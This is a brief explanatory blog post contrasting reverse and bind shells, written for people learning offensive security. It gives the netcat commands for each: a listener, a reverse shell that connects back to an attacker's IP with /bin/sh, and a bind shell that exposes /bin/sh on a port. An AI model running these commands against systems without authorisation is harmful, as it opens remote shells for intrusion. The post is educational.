Reverse vs Bind Shell

There are two types (perhaps more?) of shells that we attempt to establish when hacking a target: the reverse shell and the bind shell.

Reverse Shell

The reverse shell is the most common type of shell found in the wild. This type of shell goes like this:

  1. We open a port locally, such as 4444, using nc like this: nc -lvp 4444
  2. We "pop" a remote host and get it to execute nc $ourIP 4444 -e /bin/sh

This results in the remote system talking back to our port on 4444, giving us a shell on the remote system.

This type of shell is a "reverse" shell because the remote system is establishing the shell by talking to us. Normally you'd establish the connection from your local system, but the reverse shell literally reverses this logic.

Here's a dorky diagram I drew to illustrate the above.

Bind Shell

The bind shell is almost like a traditional connection - the remote server offers a network service on a port and you connect to it. This is how SSH operates.

The primary difference between the two shell types is that a reverse shell connects back to us, which requires our networking infrastructure to let that inbound connection in. The bind shell opens or "binds" to a port on the remote host that we then connect to.

A bind shell goes like this:

  1. We pop a remote host and start a listener on it that binds a shell to a port: nc -lvp 4444 -e /bin/sh
  2. We connect to the remote shell (nc $remoteIP 4444) and then take advantage of the access to elevate our privileges

Michael Crilly

A simple nerd.
Brisbane, Australia